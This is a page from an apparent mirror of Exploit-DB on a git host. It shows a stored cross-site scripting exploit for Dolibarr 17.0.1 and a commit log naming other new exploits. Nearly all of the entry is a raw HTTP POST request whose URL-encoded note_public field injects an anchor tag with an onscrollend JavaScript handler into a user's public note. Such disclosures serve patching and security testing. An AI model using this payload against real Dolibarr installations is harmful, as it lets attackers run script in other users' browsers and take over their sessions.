bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51683.txt
Exploit-DB e07f33f24d DB: 2023-08-22 
17 changes to exploits/shellcodes/ghdb

EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR)
EuroTel ETL3100 - Transmitter Default Credentials
EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download

Color Prediction Game v1.0 - SQL Injection

Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)

Dolibarr Version 17.0.1 - Stored XSS

Global - Multi School Management System Express v1.0- SQL Injection

OVOO Movie Portal CMS v3.3.3 - SQL Injection

PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities

Taskhub CRM Tool 2.8.6 - SQL Injection

Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions
TSPlus 16.0.0.0 - Remote Work Insecure Credential storage
TSplus 16.0.0.0 - Remote Work Insecure Files and Folders
TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions

Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)
2023-08-22 00:16:22 +00:00

36 lines
No EOL
2 KiB
Text
Raw Blame History

# Exploit Title: Dolibarr Version 17.0.1 - Stored XSS
# Dork:
# Date: 2023-08-09
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php
# Version: 17.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE :
-----------------------------------------------------------------------------
Requests
POST /dolibarr-17.0.1/htdocs/user/note.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 599
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/dolibarr-17.0.1/htdocs/user/note.php?action=editnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: 5c8ccd93504819395bd9eb83add769eb=g6sujc3ss8cj53cvk84qv0jgol; f758a1cd0925196cd7746824e3df122b=u04rsmdqgrdpr2kduo49gl0rmh; DOLSESSID_18109f368bbc82f2433d1d6c639db71bb97e2bd1=sud22bsu9sbqqc4bgcloki2eht
Connection: close
token=4b1479ad024e82d298b395bfab9b1916&action=setnote_public&token=4b1479ad024e82d298b395bfab9b1916&id=1&note_public=%3Ca+onscrollend%3Dalert%281%29+style%3D%22display%3Ablock%3Boverflow%3Aauto%3Bborder%3A1px+dashed%3Bwidth%3A500px%3Bheight%3A100px%3B%22%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cspan+id%3Dx%3Etest%3C%2Fspan%3E%3C%2Fa%3E&modify=De%C4%9Fi%C5%9Ftir
Reference in a new issue View git blame Copy permalink